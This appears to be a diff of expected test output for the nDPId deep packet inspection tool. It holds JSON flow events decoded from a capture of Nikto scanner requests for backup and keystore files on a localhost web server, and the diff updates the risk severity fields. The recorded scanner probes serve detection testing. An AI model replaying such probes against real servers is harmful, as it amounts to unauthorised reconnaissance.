 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
